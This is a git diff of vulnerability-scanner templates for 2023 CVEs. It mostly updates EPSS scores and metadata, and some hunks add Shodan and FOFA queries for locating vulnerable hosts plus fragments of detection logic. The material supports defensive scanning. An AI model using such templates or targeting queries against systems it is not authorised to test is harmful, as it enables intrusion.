CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-23752 - epss-score: 0.49602 - epss-percentile: 0.97062 + epss-score: 0.55175 + epss-percentile: 0.97249 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 5f45303bd9..fb26892faf 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-24044 cwe-id: CWE-601 epss-score: 0.00114 - epss-percentile: 0.44165 + epss-percentile: 0.44542 cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index c8aef5e22e..568ac725f2 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-24243 cwe-id: CWE-918 epss-score: 0.00448 - epss-percentile: 0.71868 + epss-percentile: 0.72178 cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index b8f277d126..b883253b7c 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-24278 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37279 + epss-percentile: 0.37651 cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 2ce1a1c77b..647b4d2320 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-24322 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.31519 + epss-percentile: 0.31941 cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 976a91489e..3a7993b00d 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24488 cwe-id: CWE-79 - epss-score: 0.01498 - epss-percentile: 0.85239 + epss-score: 0.01446 + epss-percentile: 0.8514 cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index 0785a171a4..a12fcc1a7f 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-24489 - epss-score: 0.9673 - epss-percentile: 0.99506 + epss-score: 0.9686 + epss-percentile: 0.99585 cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 1ca9349ca2..7f37f47f54 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-24657 cwe-id: CWE-79 epss-score: 0.00076 - epss-percentile: 0.31252 + epss-percentile: 0.3161 cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 4d649f5cc6..3b26f3915e 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-24733 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26173 + epss-percentile: 0.26512 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 85caf35c6d..89a311c58f 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24735 cwe-id: CWE-601 - epss-score: 0.00985 - epss-percentile: 0.81565 + epss-score: 0.00822 + epss-percentile: 0.79961 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 56df907e6f..087b1fc988 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-24737 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26173 + epss-percentile: 0.26512 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index 5339dfe1c3..a56b5dd64b 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -6,20 +6,24 @@ info: severity: critical description: | OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4. + remediation: Fixed in v1.22.3-4 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-2479 - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/ - remediation: Fixed in v1.22.3-4 + - https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fe classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2479 cwe-id: CWE-78 + epss-score: 0.96163 + epss-percentile: 0.9932 cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:* - epss-score: 0.0008 metadata: max-request: 1 - tags: cve,cve2023,appium,oast,rce + vendor: appium + product: appium-desktop + tags: huntr,cve,cve2023,appium,oast,rce http: - method: GET diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 24ee7f3b52..885efacf44 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25135 cwe-id: CWE-502 - epss-score: 0.74668 - epss-percentile: 0.97724 + epss-score: 0.60967 + epss-percentile: 0.97405 cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index 1b8c23df0c..ba38d38fe3 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25157 cwe-id: CWE-89 - epss-score: 0.3525 - epss-percentile: 0.96575 + epss-score: 0.3426 + epss-percentile: 0.96584 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index f4e0d7c210..5c9214e804 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-25346 cwe-id: CWE-79 epss-score: 0.00089 - epss-percentile: 0.36851 + epss-percentile: 0.3721 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 28804f27ea..a9e76427e6 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -16,17 +16,16 @@ info: cvss-score: 7.5 cve-id: CVE-2023-25573 cwe-id: CWE-862 - epss-score: 0.00084 - epss-percentile: 0.34763 + epss-score: 0.01917 + epss-percentile: 0.87238 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: body="Metersphere" + max-request: 1 vendor: metersphere product: metersphere + fofa-query: body="Metersphere" tags: cve,cve2023,metersphere,lfi - variables: str: "{{rand_base(4)}}" rand: "{{rand_base(3)}}" diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 500447f9b4..a59c1215bf 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25717 cwe-id: CWE-94 - epss-score: 0.96566 - epss-percentile: 0.99438 + epss-score: 0.96168 + epss-percentile: 0.99323 cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 03cced30db..0bd926932a 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.1 cve-id: CVE-2023-26067 cwe-id: CWE-20 - epss-score: 0.02039 - epss-percentile: 0.87518 + epss-score: 0.02305 + epss-percentile: 0.88448 cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index d961c4c9b5..1d3950218f 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-26255 cwe-id: CWE-22 epss-score: 0.14175 - epss-percentile: 0.94985 + epss-percentile: 0.95067 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 2c5f8c2e5b..16370b9f69 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-26256 cwe-id: CWE-22 epss-score: 0.00612 - epss-percentile: 0.76007 + epss-percentile: 0.76268 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index f02043e8a0..fbaf41ce17 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.6 cve-id: CVE-2023-26360 cwe-id: CWE-284 - epss-score: 0.90844 - epss-percentile: 0.98442 + epss-score: 0.91978 + epss-percentile: 0.98605 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index 2af82f3e94..f1f260629a 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-26469 cwe-id: CWE-22 - epss-score: 0.22328 - epss-percentile: 0.95851 + epss-score: 0.91808 + epss-percentile: 0.98586 cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index cab7d32bce..8c616180cf 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -11,16 +11,23 @@ info: reference: - https://github.com/sunyixuan1228/cve/blob/main/weaver.md - https://nvd.nist.gov/vuln/detail/CVE-2023-2648 + - https://vuldb.com/?ctiid.228777 + - https://vuldb.com/?id.228777 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2648 cwe-id: CWE-434 + epss-score: 0.03783 + epss-percentile: 0.90779 + cpe: cpe:2.3:a:weaver:e-office:9.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 + vendor: weaver + product: e-office fofa-query: app="泛微-EOffice" - tags: cve,cve2023,weaver,eoffice,ecology,fileupload,rce + tags: cve,cve2023,weaver,eoffice,ecology,fileupload,rce,intrusive variables: file: '{{rand_base(5, "abc")}}' diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 7681ba2887..4a6c77899e 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-26842 cwe-id: CWE-79 epss-score: 0.00148 - epss-percentile: 0.50119 + epss-percentile: 0.50489 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 4e952f066f..deaaac9f6b 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-26843 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.49905 + epss-percentile: 0.50276 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 9669c72914..f0d7e387af 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-27008 cwe-id: CWE-79 epss-score: 0.00081 - epss-percentile: 0.33383 + epss-percentile: 0.33756 cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 4659e7c454..8a1b7674a8 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27034 cwe-id: CWE-89 - epss-score: 0.00572 - epss-percentile: 0.75071 + epss-score: 0.01147 + epss-percentile: 0.832 cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index 459b527659..7b57fc6936 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-27159 cwe-id: CWE-918 epss-score: 0.00262 - epss-percentile: 0.63161 + epss-percentile: 0.63585 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 99bfb5fca5..cd35bada47 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27179 cwe-id: CWE-434 - epss-score: 0.03737 - epss-percentile: 0.9061 + epss-score: 0.01606 + epss-percentile: 0.85963 cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 3610e1c372..5078ae8398 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-27292 cwe-id: CWE-601 epss-score: 0.00073 - epss-percentile: 0.30323 + epss-percentile: 0.30666 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index 70c045fea9..f0bc50f830 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2732 cwe-id: CWE-288 - epss-score: 0.04948 - epss-percentile: 0.91796 + epss-score: 0.05999 + epss-percentile: 0.92627 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index f3730e1078..1290de19f7 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27350 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.97086 - epss-percentile: 0.99667 + epss-score: 0.97127 + epss-percentile: 0.99712 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index bc0497236d..907d8f0eb5 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-27372 - epss-score: 0.97084 - epss-percentile: 0.99665 + epss-score: 0.9718 + epss-percentile: 0.99744 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index dd868fb49e..e572b80e1e 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-27482 cwe-id: CWE-287 epss-score: 0.03052 - epss-percentile: 0.89691 + epss-percentile: 0.89838 cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 62522af1e7..572c7e6766 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27524 cwe-id: CWE-1188 - epss-score: 0.65287 - epss-percentile: 0.97448 + epss-score: 0.9247 + epss-percentile: 0.98661 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 05146bb2d6..595010ada3 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-27587 cwe-id: CWE-209 - epss-score: 0.11296 - epss-percentile: 0.94464 + epss-score: 0.19364 + epss-percentile: 0.9569 cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index bb9dc4c5e7..1e30cfc9af 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -9,14 +9,21 @@ info: reference: - https://github.com/8079048q/cve/blob/main/weaveroa.md - https://nvd.nist.gov/vuln/detail/CVE-2023-2766 + - https://vuldb.com/?ctiid.229271 + - https://vuldb.com/?id.229271 classification: - cve-id: CVE-2023-2766 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 + cve-id: CVE-2023-2766 cwe-id: CWE-552 + epss-score: 0.01769 + epss-percentile: 0.86587 + cpe: cpe:2.3:a:weaver:weaver_office_automation:9.5:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: weaver + product: weaver_office_automation fofa-query: app="泛微-EOffice" tags: cve,cve2023,weaver,eoffice,exposure diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 787ba35001..9e38ef585f 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2780 cwe-id: CWE-29 - epss-score: 0.01547 - epss-percentile: 0.85528 + epss-score: 0.01608 + epss-percentile: 0.85973 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 4826ae4018..9d0b88f2b5 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-2796 cwe-id: CWE-862 - epss-score: 0.20197 - epss-percentile: 0.95694 + epss-score: 0.23651 + epss-percentile: 0.96017 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,7 +29,7 @@ info: shodan-query: 'vuln:CVE-2023-2796' fofa-query: "wp-content/plugins/eventon/" google-query: inurl:"/wp-content/plugins/eventon/" - tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,eventon,bypass + tags: wpscan,packetstorm,cve,cve2023,wordpress,wp-plugin,wp,eventon,bypass http: - method: GET diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 00fd25b09b..586981abdc 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28121 cwe-id: CWE-287 - epss-score: 0.93782 - epss-percentile: 0.98781 + epss-score: 0.70096 + epss-percentile: 0.97642 cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index ad3c1583ff..23cf4942cc 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -14,14 +14,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2813 cwe-id: CWE-79 - epss-score: 0.00044 - epss-percentile: 0.08276 + epss-score: 0.00371 + epss-percentile: 0.69465 cpe: cpe:2.3:a:ajaydsouza:connections_reloaded:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 - tags: cve,cve2023,wordpress,wp-theme,xss - + vendor: ajaydsouza + product: connections_reloaded + framework: wordpress + tags: wpscan,cve,cve2023,wordpress,wp-theme,xss variables: str: "{{rand_base(6)}}" random: "{{rand_base(3)}}" diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 932a03b839..f98c3db732 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-2822 cwe-id: CWE-79 epss-score: 0.02305 - epss-percentile: 0.88289 + epss-percentile: 0.88447 cpe: cpe:2.3:a:ellucian:ethos_identity:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 6e2a220461..bdddcd2514 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-2825 cwe-id: CWE-22 - epss-score: 0.02752 - epss-percentile: 0.89231 + epss-score: 0.02646 + epss-percentile: 0.89161 cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 4ff61dd6be..0a42435be1 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28343 cwe-id: CWE-78 - epss-score: 0.3827 - epss-percentile: 0.96725 + epss-score: 0.40034 + epss-percentile: 0.96822 cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 9026ff090f..8c44898f05 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-28432 cwe-id: CWE-200 - epss-score: 0.44017 - epss-percentile: 0.96884 + epss-score: 0.14384 + epss-percentile: 0.95092 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 86adba6269..0f214a348e 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-28665 cwe-id: CWE-79 epss-score: 0.00082 - epss-percentile: 0.338 + epss-percentile: 0.34151 cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index 5eee45ba49..427d3c331d 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-29084 cwe-id: CWE-77 - epss-score: 0.23785 - epss-percentile: 0.95959 + epss-score: 0.28782 + epss-percentile: 0.96304 cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index f69c4aba97..28e21f1b20 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-29298 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.87627 - epss-percentile: 0.98219 + epss-score: 0.72523 + epss-percentile: 0.9771 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 3aa911b0d6..ca1ec7db45 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29300 cwe-id: CWE-502 - epss-score: 0.1414 - epss-percentile: 0.94979 + epss-score: 0.60087 + epss-percentile: 0.97383 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index fcf079ce44..475553b3c7 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -16,18 +16,17 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-29357 - epss-score: 0.00267 - epss-percentile: 0.63767 + epss-score: 0.78865 + epss-percentile: 0.97894 cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: microsoft product: sharepoint_server - fofa-query: app="Microsoft-SharePoint" shodan-query: http.headers_hash:-1968878704 + fofa-query: app="Microsoft-SharePoint" tags: cve,cve2023,microsoft,sharepoint_server - variables: client_id: "00000003-0000-0ff1-ce00-000000000000" @@ -56,7 +55,6 @@ http: - type: json json: - .value[].Email - matchers: - type: word part: body_2 diff 